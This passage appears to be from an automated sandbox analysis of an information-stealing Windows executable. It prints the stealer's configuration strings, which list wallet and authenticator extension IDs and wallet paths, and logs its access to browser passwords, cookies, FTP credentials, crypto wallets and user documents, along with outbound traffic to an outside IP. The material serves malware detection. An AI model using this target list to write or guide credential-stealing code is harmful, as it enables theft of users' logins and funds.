Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: b2885fa695.exe, 00000020.00000003.2691712879.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: eh","ez":"TezBox"},{"en":"lodccjjbdhfakaekdiahmedfbieldgik","ez":"DAppPlay"},{"en":"ijmpgkjfkbfhoebgogflfebnmejmfbm","ez":"BitClip"},{"en":"lkcjlnjfpbikmcmbachjpdbijejflpcm","ez":"Steem Keychain"},{"en":"onofpnbbkehpmmoabgpcpmigafmmnjh","ez":"Nash Extension"},{"en":"bcopgchhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%
Leaks process information
Source: global traffic TCP traffic: 192.168.2.4:49902 -> 185.121.15.192:80
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
